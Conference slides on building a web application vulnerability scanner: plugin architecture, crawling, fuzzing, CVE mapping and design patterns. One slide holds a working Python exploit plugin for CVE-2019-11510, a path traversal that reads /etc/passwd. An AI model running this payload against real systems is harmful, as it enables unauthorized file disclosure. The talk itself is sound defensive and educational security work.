Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view

Trung Nguyen
Building a high performance
Web Application Vulnerability Scanner

› @everping
› Founder & CEO at CyStack
› Security Researcher, Bug Hunter, Computer Engineer
› Discovered critical vulnerabilities; acknowledged by
Microsoft, IBM, D-Link, HP, Deloitte
Whoami

› What is a WAVS?
› Why do we need WAVS?
› Architecture and Design
› Challenges
Agenda

Web Application Vulnerability Scanners are
automated tools that scan web applications, normally
from the outside, to look for security vulnerabilities
such as Cross-site scripting, SQL Injection, Command
Injection, Path Traversal and insecure server
configuration

› Discover attack surfaces (URLs, headers, open
ports)
› Gather information about the target (OS, Web
frameworks, built-in technologies, sitemap)
› Detect non-business logic vulnerabilities (SQLi, XSS,
SSTI)
› Detect misconfigurations
For pentesters

› Get the same advantages that pentesters get
› See an overview of security risks in web applications
› Integrate findings into vulnerability management
› Reduce the cost of catching basic security flaws
For businesses

Should we create our own
WAVS?

NO
Unless you do it for educational purposes or for clear
commercial purposes

› User doesn’t like the way scanner X implements a feature
› User has free time
› User starts writing his own scanner and usually succeeds in implementing the one
feature he really needed
› The new web application scanner only works on a small subset of sites, since it doesn’t
know how to extract links other than the ones in tags, or can’t handle broken HTML, or is
too slow to be used on any site with more than a few hundred pages.
› The creator of the new tool maintains it for six months
› The project dies when the project lead finds more interesting things to do, finds a tool
that did what he needed, changes jobs, etc.
The usual timeline

Security testing in the wild
Discovery → Vulnerability Analysis → Exploitation
Follow the tactical exploitation

Discovery
This is the process of discovering as much
background information about the target as
possible, including hosts, operating systems,
topology, etc.

Vulnerability Analysis
Vulnerability analysis is the process of
discovering flaws in systems and applications
which can be leveraged by an attacker.

Exploitation
Exploitation focuses solely on establishing
access to a system or resource by bypassing
security restrictions.

› Scalability: New vulnerability signatures are easy to add
› Stability: Low RAM and CPU usage
› Reliability: Finds vulnerabilities with a low false-positive
rate
Requirements

The Flow
Subdomain Finder: cs.com → news.cs.com, blog.cs.com, ...
Port Scan: https://blog.cs.com:443, ftp://news.cs.com:21, https://news.cs.com:8443, ...
Crawling & Fuzzing, CPE and CVE Mapping, Public exploits Testing
Vulnerability synthesis

Architecture
Apply the plugin-based architecture: Core + Plugins
Core
› Manages the main flow
› Coordinates the processes and threads
› Provides APIs for plugins to reuse
Plugins
› Find flaws directly
› Get data from the core
› Share gathered information with other components/plugins via the core APIs
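
The split between core and plugins can be sketched in a few lines of Python. This is only an illustration under assumptions: the class names (`Core`, `Plugin`, `KnowledgeBase`, `HeaderDiscovery`, `ServerBannerAudit`) and the hard-coded header are hypothetical and are not taken from the scanner described in the talk.

```python
from abc import ABC, abstractmethod


class KnowledgeBase:
    """Shared store that plugins read from and write to via the core."""

    def __init__(self):
        self._data = {}

    def append(self, key, value):
        self._data.setdefault(key, []).append(value)

    def get(self, key):
        return list(self._data.get(key, []))


class Plugin(ABC):
    """Hypothetical base class: every plugin receives the core when it runs."""

    @abstractmethod
    def run(self, core):
        """Do the plugin's work using the APIs the core exposes."""


class Core:
    """Owns the main flow and the APIs shared by all plugins."""

    def __init__(self, target):
        self.target = target
        self.kb = KnowledgeBase()
        self._plugins = []

    def register(self, plugin):
        self._plugins.append(plugin)

    def run(self):
        # Plugins run in registration order and only talk to each other
        # through the knowledge base.
        for plugin in self._plugins:
            plugin.run(self)


class HeaderDiscovery(Plugin):
    def run(self, core):
        # A real plugin would send a request; this value is hard-coded.
        core.kb.append('headers', ('Server', 'nginx'))


class ServerBannerAudit(Plugin):
    def run(self, core):
        for name, value in core.kb.get('headers'):
            if name == 'Server':
                core.kb.append('findings', f'Server banner exposed: {value}')


core = Core('https://blog.cs.com')
core.register(HeaderDiscovery())
core.register(ServerBannerAudit())
core.run()
print(core.kb.get('findings'))
```

The audit plugin never calls the discovery plugin directly; it only reads what the core's knowledge base holds, which is what keeps new plugins cheap to add.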

Plugins
› Infrastructure: Gather all information about the target, such as sitemap, headers, OS,
web framework, etc. It runs in a loop in which the output of one discovery plugin is sent
as input to the next plugin
› Subdomain: Find all subdomains of the root domain
› Audit: Take the output of discovery plugins and find vulnerabilities by fuzzing
› Attack: Try to exploit the confirmed findings from audit plugins
› Other plugins: Output, mangle, evasion, grep, brute force
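
The discovery loop mentioned above might look roughly like the sketch below: whatever one round of plugins finds becomes the input of the next round, until nothing new turns up. The function `run_discovery`, the two toy plugins, and the `max_rounds` limit are assumptions made for illustration; the talk does not show how its scanner implements the loop.

```python
def run_discovery(seeds, plugins, max_rounds=10):
    """Feed new findings back into the plugins until nothing new appears."""
    known = set(seeds)
    pending = set(seeds)
    for _ in range(max_rounds):
        if not pending:
            break
        found = set()
        for plugin in plugins:
            for item in pending:
                found.update(plugin(item))
        # Only items nobody has seen yet go into the next round.
        pending = found - known
        known |= pending
    return known


def sitemap_plugin(url):
    # Toy plugin: pretend the site root links to two pages.
    if url == 'https://blog.cs.com/':
        return {'https://blog.cs.com/posts', 'https://blog.cs.com/about'}
    return set()


def archive_plugin(url):
    # Toy plugin: pretend every /posts page has an archive below it.
    if url.endswith('/posts'):
        return {url + '/archive'}
    return set()


discovered = run_discovery({'https://blog.cs.com/'},
                           [sitemap_plugin, archive_plugin])
print(sorted(discovered))
```

Here `archive_plugin` only finds its URL in the second round, because it depends on what `sitemap_plugin` produced in the first.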

Architecture
[Diagram: User, Discovery, Audit, Output, Knowledge Base]

Crawling and Fuzzing
› The main component is a crawler
› The crawler gets the seed URL and finds all possible URLs of the target
[Diagram: crawler loop. Elements: Seed URL, URL Queue, Requester, HTTP Response, Parse Document, URL, decision "The URL is in the queue?" (branch: "The URL is not in the queue"), Pack, Fuzzable Request]
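
A minimal sketch of such a crawler loop, using only the Python standard library, is shown below. It is an assumption-laden illustration, not the talk's implementation: `crawl`, `LinkParser`, and the injected `fetch` callable are hypothetical names, the in-memory `pages` dictionary stands in for real HTTP responses, and the step that packs each URL into a fuzzable request is left out.

```python
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urldefrag, urljoin, urlsplit


class LinkParser(HTMLParser):
    """Collects href values from <a> tags, tolerating broken HTML."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == 'a':
            for name, value in attrs:
                if name == 'href' and value:
                    self.links.append(value)


def crawl(seed_url, fetch, max_pages=100):
    """Breadth-first crawl; fetch(url) must return the response body."""
    host = urlsplit(seed_url).netloc
    queue = deque([seed_url])
    seen = {seed_url}
    visited = []
    while queue and len(visited) < max_pages:
        url = queue.popleft()
        visited.append(url)
        parser = LinkParser()
        parser.feed(fetch(url))
        for href in parser.links:
            # Resolve relative links and drop the #fragment.
            link = urldefrag(urljoin(url, href)).url
            # Stay on the target host and skip URLs already queued.
            if urlsplit(link).netloc == host and link not in seen:
                seen.add(link)
                queue.append(link)
    return visited


# Fake site used instead of real HTTP requests.
pages = {
    'https://blog.cs.com/': '<a href="/a">A</a><a href="/b#top">B</a>',
    'https://blog.cs.com/a': '<a href="/">home</a>'
                             '<a href="https://other.example/x">x</a>',
    'https://blog.cs.com/b': '',
}
visited = crawl('https://blog.cs.com/', lambda url: pages.get(url, ''))
print(visited)
```

Passing `fetch` in as a parameter keeps the queue logic testable without network access; a real requester would replace the lambda.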

[Diagram: fuzzing flow. Elements: Fuzzable Request, Pack, Raw fuzz data, Mutant, Debugger, Knowledge Base]
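
One way to picture the step from a fuzzable request to its mutants: each mutant is a copy of the request with exactly one parameter replaced by raw fuzz data. The sketch below covers only GET query parameters; `create_mutants` is a hypothetical helper and the single-quote payload is just an example.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def create_mutants(url, payloads):
    """Return one URL per (parameter, payload) pair, changing one value."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    mutants = []
    for index, (name, _original) in enumerate(params):
        for payload in payloads:
            mutated = list(params)
            mutated[index] = (name, payload)
            query = urlencode(mutated)
            mutants.append(urlunsplit(parts._replace(query=query)))
    return mutants


mutants = create_mutants('https://blog.com/posts/?id=1&lang=en', ["'"])
for mutant in mutants:
    print(mutant)
```

Changing one parameter at a time keeps every other value valid, so a difference in the response can be attributed to the parameter under test.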

› Normally used for finding 0-day vulnerabilities or common vulnerabilities (SQLi, XSS,
etc.)
› Implementing a new plugin is complex
› High rate of false positives

CPE and CVE mapping
› Detect the name and version of every technology and framework the target uses
› Convert the findings to CPE (Common Platform Enumeration) strings
› CPE is a structured naming scheme for information technology systems, software,
and packages.
› Find the CVEs that map to those CPEs
cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*
cpe:/o:linux:linux_kernel:2.6.0
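
As a rough sketch of the conversion step, the function below builds a CPE 2.3 formatted string from a detected part, vendor, product, and version, then looks it up in a local table. The helper names are hypothetical, the normalization is deliberately naive (real CPE names need escaping of special characters), and the CVE identifiers in `CVE_DB` are made-up placeholders, not real advisories.

```python
def to_cpe23(part, vendor, product, version):
    """Build a CPE 2.3 formatted string; unknown attributes become '*'."""

    def normalize(value):
        # Naive normalization: lowercase, spaces to underscores.
        return value.strip().lower().replace(' ', '_')

    fields = [part, normalize(vendor), normalize(product), normalize(version)]
    fields += ['*'] * 7  # update, edition, language, sw_edition,
    #                      target_sw, target_hw, other
    return 'cpe:2.3:' + ':'.join(fields)


# Placeholder data: these CVE IDs are invented for the example.
CVE_DB = {
    'cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*': [
        'CVE-0000-0001',
        'CVE-0000-0002',
    ],
}


def find_cves(cpe):
    """Exact-match lookup; a real database would also match version ranges."""
    return CVE_DB.get(cpe, [])


cpe = to_cpe23('o', 'Linux', 'Linux Kernel', '2.6.0')
print(cpe)
print(find_cves(cpe))
```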

CPE and CVE mapping
› Sometimes, converting name and version to CPE format is impossible
› Building your own threat intelligence or vulnerability DB is required

Public exploits testing
› Also known as blind testing
› Run known exploit code against your target. If the response matches the signature, the
target is vulnerable
› Detecting technologies is not really necessary

› Normally used for finding 1-day vulnerabilities, CVEs, and known public exploits for
specific applications or frameworks
› Implementing a new plugin is easy
› Low rate of false positives

class Cve201911510(AttackPlugin):
    def __init__(self):
        super().__init__()
        self.path = '/dana-na'
        self.payload = self.generate_payload()

    def generate_payload(self, file_name=''):
        # Default to a file whose content is easy to recognise
        if file_name == '':
            file_name = '/etc/passwd'
        payload = f'/../dana/html5acc/guacamole/../../../../../../..{file_name}?/dana/html5acc/guacamole/'
        return payload

    def real_exploit(self, url):
        # path_as_is=True keeps the '../' sequences from being normalised
        resp = self.requester.get(url + self.payload, path_as_is=True)
        # Signature: the first line of a typical /etc/passwd
        if 'root:x:0' in resp.text:
            return True
        return False

Programming languages
› The main language depends on the environment in which the scanner is installed
› If the scanner is distributed as a desktop app, it should be written in a low-level
language to protect against reverse engineering. Python is a bad choice.
› If the scanner is delivered as a service, the language is not a problem
› The core can be written in any programming language
› The plugins should be written in a scripting language such as Python, Lua, or even
your own language for scalability

Code design
› Design patterns are very important if you’d like to scale up the scanner
class CoreStrategy(object):
    def start(self):
        try:
            target = self._core.base_target
            if not target.is_valid():
                logger.error('The target is not valid')
                return
            if target.get_type() == TYPE_URL:
                # URL targets go through all three phases
                self.discover()
                self.attack()
                self.audit()
            else:
                # Other target types skip the audit phase
                self.discover()
                self.attack()
        except ScanMustStopException:
            logger.error('[!] The scan will be finished now')
        except Exception:
            # Assumes a logging.Logger-like object; error() needs a message
            logger.exception('Unexpected error during the scan')
Strategy Pattern

Code design
def real_exploit(self, url):
    """
    This method MUST be implemented on every plugin.
    :param url: url to test whether it can be exploited or not
    :return: True if it is vulnerable. Otherwise, false.
    """
    msg = 'Plugin is not implementing required method real_exploit'
    raise NotImplementException(msg)
Abstract Pattern

Code design
def factory(module_name, *args):
    """
    This function creates an instance of a class that's inside a module
    with the same name.
    Example :
    >>> cve_2015_4852 = factory('exploits.plugins.attack.cve_2015_4852')
    >>> cve_2015_4852.get_name()
    'CVE-2015-4852'
    :param module_name: Which plugin do you need?
    :return: An instance.
    """
Factory Pattern
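
The slide shows only the docstring of `factory`. One plausible body, sketched here with `importlib`, imports the module and instantiates the class whose name equals the last part of the module path, as the docstring describes. This is a guess at the mechanism, not the talk's code; the in-memory demo module and its `get_name` return value exist only so the example runs without a plugin package on disk.

```python
import importlib
import sys
import types


def factory(module_name, *args):
    """Instantiate the class named like the last part of module_name."""
    module = importlib.import_module(module_name)
    class_name = module_name.rsplit('.', 1)[-1]
    plugin_class = getattr(module, class_name)
    return plugin_class(*args)


# Demo only: register a fake plugin module in memory.
class cve_2015_4852:
    def get_name(self):
        return 'CVE-2015-4852'


demo_module = types.ModuleType('cve_2015_4852')
demo_module.cve_2015_4852 = cve_2015_4852
sys.modules['cve_2015_4852'] = demo_module

plugin = factory('cve_2015_4852')
print(plugin.get_name())
```

With this convention the core can load a plugin from nothing more than its dotted name, for example one read from a configuration file.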

› A traditional crawler does not work with JS-based websites
or single-page applications (Angular, Vue.js, React)
JavaScript crawling

› Available solutions: Use headless browsers to render JS
on the client side (Chromium, Firefox, PhantomJS, Splash, etc.)
› Cons: Those engines consume a lot of computer resources
(RAM, CPU) and render slowly
JavaScript crawling

› Scanners normally consume a lot of
› I/O, since they send many requests to external hosts
› CPU, since responses have to be analyzed continuously
› RAM, due to a multi-threaded design or failing to free
memory that is no longer needed
High overhead

› Solutions
› Optimize your code
› Consider using a low-level programming language
High overhead

URL Rewrite
A scanner can easily detect GET parameters, as in
https://blog.com/posts/?id=4193869
But it can hardly detect this one
https://blog.com/news/stuck-in-vietnam-a-stroke-of-luck-4193869.html
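
A common heuristic for rewritten URLs, sketched below, is to treat a run of digits at the end of a path segment (optionally followed by a file extension) as a hidden parameter worth fuzzing. The talk does not say how its scanner handles this case; `path_parameters` and its regular expression are assumptions, and the heuristic will both miss non-numeric identifiers and flag harmless numbers.

```python
import re
from urllib.parse import urlsplit

# Digits at the end of a segment, optionally followed by an extension.
TRAILING_ID = re.compile(r'(\d+)(?:\.\w+)?$')


def path_parameters(url):
    """Return (segment_index, value) for path segments that look like IDs."""
    segments = urlsplit(url).path.strip('/').split('/')
    found = []
    for index, segment in enumerate(segments):
        match = TRAILING_ID.search(segment)
        if match:
            found.append((index, match.group(1)))
    return found


rewritten = path_parameters(
    'https://blog.com/news/stuck-in-vietnam-a-stroke-of-luck-4193869.html')
plain = path_parameters('https://blog.com/posts/?id=4193869')
print(rewritten)
print(plain)
```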

Similar URLs
URLs like the one below are similar to each other
https://blog.com/news/n1.html
But a scanner may crawl all of them, which increases the
scan time
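
One possible way to limit this is to reduce each URL to a pattern and crawl only a few URLs per pattern. In the sketch below, digits in the path are replaced by a placeholder and query parameters are compared by name only. The helpers `url_pattern` and `dedupe_similar` are hypothetical, and `n2.html`, `n3.html`, and `about.html` are invented examples that extend the `n1.html` URL from the slide.

```python
import re
from urllib.parse import parse_qsl, urlsplit


def url_pattern(url):
    """Reduce a URL to (host, path with digits masked, parameter names)."""
    parts = urlsplit(url)
    path = re.sub(r'\d+', '{n}', parts.path)
    names = sorted(name for name, _ in
                   parse_qsl(parts.query, keep_blank_values=True))
    return (parts.netloc, path, tuple(names))


def dedupe_similar(urls, per_pattern=1):
    """Keep at most per_pattern URLs for each pattern, in input order."""
    kept = []
    counts = {}
    for url in urls:
        key = url_pattern(url)
        counts[key] = counts.get(key, 0) + 1
        if counts[key] <= per_pattern:
            kept.append(url)
    return kept


kept = dedupe_similar([
    'https://blog.com/news/n1.html',
    'https://blog.com/news/n2.html',
    'https://blog.com/news/n3.html',
    'https://blog.com/about.html',
])
print(kept)
```

Raising `per_pattern` trades scan time for coverage, which matters when pages that share a pattern are not actually served by the same code path.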

› Many web applications handle requests in unexpected
ways (e.g., returning status code 200 for not-found pages)
› Connection delays
› The web content itself includes vulnerability signatures
False positives

› Solution: Fix case by case
False positives
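
As one example of such a case-by-case fix, pages that return status 200 for missing resources can often be caught by comparing the response with the response to a random path that cannot exist. This is a widely used technique, not one the talk describes; `looks_like_not_found`, the injected `fetch` callable, the 0.9 threshold, and the fake site below are all assumptions.

```python
import uuid
from difflib import SequenceMatcher
from urllib.parse import urljoin


def looks_like_not_found(url, fetch, threshold=0.9):
    """fetch(url) must return (status_code, body)."""
    status, body = fetch(url)
    if status == 404:
        return True
    # Ask for a random sibling path that should not exist.
    random_url = urljoin(url, uuid.uuid4().hex)
    _, baseline = fetch(random_url)
    # If both bodies are nearly identical, the page is a disguised 404.
    similarity = SequenceMatcher(None, body, baseline).ratio()
    return similarity >= threshold


# Fake site: every unknown path answers 200 with the same error page.
site = {'https://blog.com/': 'Welcome to the blog, here are the latest posts'}


def fake_fetch(url):
    return 200, site.get(url, 'Sorry, page not found')


missing = looks_like_not_found('https://blog.com/admin', fake_fetch)
existing = looks_like_not_found('https://blog.com/', fake_fetch)
print(missing, existing)
```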

› Identify the appropriate form field (email, phone, name, city)
› Authenticate to the target
› Crawl and fuzz APIs
› Deal with business logic vulnerabilities
Others

Thanks !
trungnh@cystack.net
@everping
